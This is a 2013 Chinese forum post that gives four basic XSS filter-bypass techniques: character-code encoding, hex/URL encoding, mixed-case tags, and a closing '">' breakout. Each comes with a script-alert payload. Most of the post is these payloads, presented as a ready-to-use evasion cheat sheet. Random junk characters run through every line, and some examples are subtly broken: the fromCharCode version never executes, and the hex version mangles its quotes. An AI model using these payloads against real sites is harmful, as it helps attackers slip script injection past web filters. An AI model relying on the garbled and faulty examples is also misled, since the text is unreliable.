四种超级基础的绕过方法。. n5 ^4 {$ ?! b! {
1.转换为ASCII码 U/ a. ^/ R N. N
例子:原脚本为<script>alert(‘I love F4ck’)</script ># s4 |; \$ ]% }* ?
通过转换,变成:
8 ^, |+ j6 h+ ?7 q6 i6 e<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
( p! C& B" P: o* U' C2 W
{# Q* C4 _) D& @# X9 T W% |5 j2.转换为HEX(十六进制)
/ P9 b0 m+ @9 _+ ]& }7 @9 j5 f' c例子:原脚本为<script>alert(‘I love F4ck’)</script>% ]8 a$ d$ o" F4 p' x6 w9 l
通过转换,变成:
/ k! @: E& x% W% a%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
, `+ w; z! l" R$ D* f * L8 s8 [4 y1 l; b/ r
3.转换脚本的大小写: y3 j9 \ W8 c
例子:原脚本为<script>alert(‘I love F4ck’)</script>
; R, _3 M H+ f$ G0 `! w转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>% L( o" V# x! E1 {
5 G; n' w9 h2 y; u, F# ]& f" l5 ^4.增加闭合标记”>: y" Q' W" W$ e
例子:原脚本为<script>alert(‘I love F4ck’)</script>
0 G. @; Y# j( G# @6 s转换为:”><script>alert(‘I love F4ck’)</script>
, p& S$ o1 n& V3 W4 e6 F+ c更详细绕过技术请参考此网页
. J& \3 _0 Z. h7 O& Lhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
2 ~5 q; c' Y# F8 |
( B r8 e" }3 d' L转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对